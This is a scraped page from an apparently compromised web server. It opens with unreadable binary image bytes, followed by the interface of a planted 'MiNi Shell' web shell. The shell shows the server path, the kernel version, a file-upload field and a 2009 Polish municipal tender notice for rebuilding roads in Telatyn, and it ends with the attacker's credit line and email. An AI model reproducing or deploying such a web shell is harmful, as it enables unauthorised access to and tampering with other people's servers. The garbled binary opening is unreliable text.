JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090427/122092-N-2009.html

<p class="kh_header"><b>Telatyn: Przebudowa dróg gminnych naterenie Gminy Telatyn</b><br>
<b>Numer ogłoszenia: 122092 - 2009; data zamieszczenia: 27.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Telatyn , Telatyn 71, 22-652 Telatyn, woj. lubelskie, tel. 084 6613110, faks 084 6613110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.telatyn.bip.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg gminnych naterenie Gminy Telatyn.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:  
PRZEBUDOWA DRÓG GMINNYCH NA TERENIE GMINY TELATYN 
a w szczególności:

1. 	Droga gminna Nr 011700L w m. Poturzyn 	DŁ. 350m, szer.  3,5m. + 2x5 m3Remont lokalnych wyboi krusz. stab. cement.  m3 8Warstwa profilująco - wzmacniająca z krusz. stab. cementem śr. gr. 8cm + nawierzchnia asfaltowa  gr. 3cmRegulacja poboczy na całym odcinku do spadku 6% szer. poboczy 2 x 0,75m.Oznakowanie pionowe szt 1 (ustąp pierwszeństwa przejazdu) 
2. 	Droga gminna Nr 011688L w m. Żulice 	DŁ. 400m, szer.  3,5 m. + 1 x 5m2Profilowanie istniejącej nawierzchni żużlowo-niesortowej spycharkami z przemieszczaniem nadmiaru na pobocza.Dł. 400 szer. 3,5m - warstwa profilująco- wzmacniająca z krusz. stab. cementem śr. gr. 10cm + nawierzchnia asfaltowa  gr. 3cm Regulacja poboczy na całym odcinku do spadku 6% szer. poboczy 2 x 0,75m Oznakowanie pionowe szt. 1 (ustąp pierwszeństwa przejazdu)
3.	Droga gminna Nr 011658L w m. Kryszyn Rudka 	DŁ. 390m, szer.  3,5m.  + skrzyżowanie 40m2Warstwa profilująco- wzmacniająca z krusz. stab. cementem śr. gr. 6cm + nawierzchnia asfaltowa  gr. 3cmRegulacja poboczy na całym odcinku do spadku 6% szer. poboczy 2 x 0,75mUstawienie znaków drogowych pionowych szt. 1 (tablica prowadząca U - 3b).
4.	Droga gminna Nr 011697L w m. Radków Kol. 	DŁ. 350m, szer.  3,5m. + 2 x 5m Profilowanie łuku krusz. stab. cement.  m3 5Warstwa profilująco wzmacniająca z krusz. stab. cementem śr. gr. 8cm + nawierzchnia asfaltowa  gr. 3cmRegulacja poboczy na całym odcinku do spadku 6% szer. poboczy 2 x 0,75m.Oznakowanie pionowe szt 1 (ustąp pierwszeństwa przejazdu)
5.	Droga gminna Nr 011673L  w m. Radków 	DŁ. 310m, szer.  4m.Remont lokalnych wyboi  krusz. stab. cement.  m3 1Warstwa profilująco wzmacniająca z krusz.  stab.  cementem śr. gr. 8cm + nawierzchnia asfaltowa  gr. 3cmRegulacja poboczy na całym odcinku do spadku 6% szer. poboczy 2 x 0,75mOznakowanie pionowe szt. 1 ( ustąp pierwszeństwa przejazdu)
6. 	Droga gminna Nr 011668L w m. Telatyn  	DŁ. 470m, szer.  4,0 m. + 2 x 5m2Profilowanie istniejącej nawierzchni niesortowej spycharkami z przemieszczaniem nadmiaru na pobocza.Dł. 470 szer. 4m - warstwa profilująco - wzmacniająca z krusz. stab. cementem śr. gr. 10cm + nawierzchnia asfaltowa  gr. 3cm Regulacja poboczy na całym odcinku do spadku 6% szer. poboczy 2 x 0,75m Oznakowanie pionowe szt. 1 (ustąp pierwszeństwa przejazdu)
7.	Droga gminna Nr 011669L w m. Wasylów	                                                       DŁ. 350m, szer.  3,5m. Remont lokalnych wyboi krusz. stab. cement.  m3 5Warstwa profilująco wzmacniająca z krusz. stab. cementem śr. gr. 8cm + nawierzchnia asfaltowa  gr. 3cmRegulacja poboczy na całym odcinku do spadku 6% szer. poboczy 2 x 0,75m.
8.	Droga gminna Nr 011706w m. Łykoszyn	DŁ. 480m, szer.  4,5m. + 4 x 5m2Remont lokalnych wyboi krusz. stab. cement.  m3 5Warstwa profilująco wzmacniająca z krusz. stab. cementem śr. gr. 8cm + nawierzchnia asfaltowa  gr. 3cmRegulacja poboczy na całym odcinku do spadku 6% szer. poboczy 2 x 0,75m. .Ustawienie znaków drogowych pionowych (ustąp pierwszeństwa przejazdu).
9.	Droga gminna Nr 011665L w m. Marysin	DŁ. 213m, szer.  4,0m. + 2 x 5m2Warstwa  wyrównawcza z betonu asfaltowego gr. 2cm. + nawierzchnia asfaltowa  gr. 3cm.Regulacja poboczy na całym odcinku do spadku 6% szer. poboczy 2 x 0,75m..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.00-1, 45.23.31.21-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w kwocie 10 tys. zł. najpóźniej do dnia i godziny złożenia ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków 
1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie przepisów art. 24 ust. 1 lub 2 Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. 	W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, zwanej dalej ustawą, wykonawca zobowiązany jest złożyć , w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę, następujące dokumenty:
1) aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2) oświadczenie o spełnieniu warunków udziału w postępowaniu i nie podleganiu wykluczeniu zgodnie z art. 22 ust.1 i art.. 24 ust. 1 i 2 Pzp.
3) dokumenty potwierdzające posiadanie uprawnień/ pełnomocnictw osób składających ofertę, o ile fakt ten nie wynika z przedstawionych dokumentów rejestrowych.
2. W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia, wykonawca zobowiązany jest złożyć następujące dokumenty:
1) wykazu wykonanych w okresie ostatnich pięciu lat robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania zał. nr 3 oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - załączyć referencje;  na co najmniej 1 zadanie o podobnym charakterze. 
2) wykazu osób którymi dysponuje lub będzie dysponował wykonawca i które  będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności zał. nr 4; 
 co najmniej:
 -   jednego kierownika budowy posiadającego uprawnienia budowlane i zrzeszonego w Izbie Inżynierów Budownictwa z min. stażem 5 lat,
3) dokumentów stwierdzających, że osoby, które będą wykonywać zamówienie, posiadają    wymagane uprawnienia ( kserokopia  uprawnień kierownika budowy)
4) pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 5, wykonawca wskazał osoby, którymi będzie dysponował.
3.  W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia jest on zobowiązany złożyć następujące dokumenty:
- informacji banku, w którym wykonawca posiada podstawowy rachunek bankowy, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę nie mniejsza jak wartość oferty, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
      - polisy lub innego dokumentu ubezpieczenia potwierdzającego, że wykonawca jest      ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
4. Dokumenty wymagane w przypadku składania oferty wspólnej:
 Wykonawcy ubiegający się wspólnie  o udzielenie zamówienia muszą dołączyć: 
1)	pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego 
2)	 umowę regulującą współpracę podmiotów występujących wspólnie
3)	oferta winna zawierać dokumenty i oświadczenia wymienione w pkt. VI.1. niniejszej specyfikacji dla każdego partnera  z osobna, pozostałe dokumenty składane są wspólnie.

Oferta winna być podpisana przez każdego z wykonawców występujących wspólnie lub upoważnionego przedstawiciela/ partnera wiodącego.
Upoważnienie do pełnienia funkcji przedstawiciela / partnera wiodącego wymaga podpisu prawnie upoważnionych przedstawicieli każdego z wykonawców występujących wspólnie/ partnerów - należy załączyć do oferty.
Przedstawiciel/ wiodący partner winien być upoważniony do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań. 
5. Pozostałe dokumenty :
-	oferta przetargowa
-	kosztorysy inwestorskie 
-	zaakceptowany projekt umowy
-	dowód wpłaty wadium.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.telatyn.bip.lublin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Telatynie, 22-652 Telatyn.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2009 godzina 10:00, miejsce: Sekretariat Urzędu Gminy w Telatynie.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com